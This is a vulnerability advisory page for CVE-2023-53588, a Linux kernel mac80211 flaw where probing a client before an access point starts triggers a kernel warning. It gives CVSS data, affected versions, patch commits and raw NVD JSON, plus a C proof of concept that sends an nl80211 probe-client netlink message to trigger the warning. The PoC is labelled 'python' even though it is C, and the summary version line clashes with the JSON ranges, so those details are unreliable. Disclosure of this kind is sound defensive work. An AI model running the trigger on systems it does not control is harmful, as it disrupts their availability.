Security Vulnerability Report
中文
CVE-2023-53588 CVSS 5.5 MEDIUM

CVE-2023-53588

Published: 2025-10-04 16:15:55
Last Modified: 2026-03-23 18:36:24
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: wifi: mac80211: check for station first in client probe When probing a client, first check if we have it, and then check for the channel context, otherwise you can trigger the warning there easily by probing when the AP isn't even started yet. Since a client existing means the AP is also operating, we can then keep the warning. Also simplify the moved code a bit.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.6 (修复提交: 67dfa589aa8806c7959cbca2f4613b8d41c75a06)
Linux Kernel stable分支 (修复提交: 7dce2deb0b03aaf46c87ceedea81ef4153e26c40)
Linux Kernel stable分支 (修复提交: 7e1cda5cf07f848e6b50b4e5e7761ffbce905a3d)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* CVE-2023-53588 PoC - Linux Kernel mac80211 Client Probe Vulnerability * This PoC demonstrates how to trigger the vulnerability by performing * a client probe before the AP is started. * * Note: This requires a wireless card supported by mac80211 drivers. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/nl80211.h> #include <netlink/genl/genl.h> #include <netlink/genl/ctrl.h> static int nl80211_trigger_probe(struct nl_sock *sk, int ifindex) { struct nl_msg *msg; int ret; // Create netlink message for client probe msg = nlmsg_alloc(); if (!msg) { fprintf(stderr, "Failed to allocate netlink message\n"); return -1; } // Set message header - NL80211_CMD_PROBE_CLIENT genlmsg_put(msg, 0, 0, genl_ctrl_resolve(sk, "nl80211"), 0, 0, NL80211_CMD_PROBE_CLIENT, 0); // Add interface index attribute nla_put_u32(msg, NL80211_ATTR_IFINDEX, ifindex); // Add MAC address attribute (required for probe) unsigned char target_mac[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}; nla_put(msg, NL80211_ATTR_MAC, 6, target_mac); // Add peer MAC address nla_put(msg, NL80211_ATTR_PEER_MAC, 6, target_mac); // Send the message - this should trigger the warning // because AP is not started yet (no channel context) ret = nl_send_auto(sk, msg); if (ret < 0) { fprintf(stderr, "Failed to send netlink message: %d\n", ret); } else { printf("Probe message sent successfully\n"); printf("Check dmesg for kernel warning if vulnerable\n"); } nlmsg_free(msg); return ret; } int main(int argc, char *argv[]) { struct nl_sock *sk; int ifindex = 0; // Interface index of wireless device if (argc < 2) { fprintf(stderr, "Usage: %s <interface_index>\n", argv[0]); fprintf(stderr, "Example: %s 3\n", argv[0]); return 1; } ifindex = atoi(argv[1]); // Allocate netlink socket sk = nl_socket_alloc(); if (!sk) { fprintf(stderr, "Failed to allocate netlink socket\n"); return 1; } // Connect to generic netlink if (genl_connect(sk) < 0) { fprintf(stderr, "Failed to connect to generic netlink\n"); nl_socket_free(sk); return 1; } printf("Attempting to trigger CVE-2023-53588...\n"); printf("Interface index: %d\n", ifindex); printf("Make sure AP mode is NOT started on this interface\n"); // Trigger the vulnerability nl80211_trigger_probe(sk, ifindex); // Cleanup nl_socket_free(sk); printf("Done. Check 'dmesg' for kernel warnings.\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53588", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:55.200", "lastModified": "2026-03-23T18:36:24.410", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mac80211: check for station first in client probe\n\nWhen probing a client, first check if we have it, and then\ncheck for the channel context, otherwise you can trigger\nthe warning there easily by probing when the AP isn't even\nstarted yet. Since a client existing means the AP is also\noperating, we can then keep the warning.\n\nAlso simplify the moved code a bit."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.8", "versionEndExcluding": "6.1.55", "matchCriteriaId": "F0087966-6BC7-441B-81DC-701E50DB7659"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.5.5", "matchCriteriaId": "8CF71E85-DA24-4925-95C5-E5C15DA71AE6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/67dfa589aa8806c7959cbca2f4613b8d41c75a06", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7dce2deb0b03aaf46c87ceedea81ef4153e26c40", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7e1cda5cf07f848e6b50b4e5e7761ffbce905a3d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.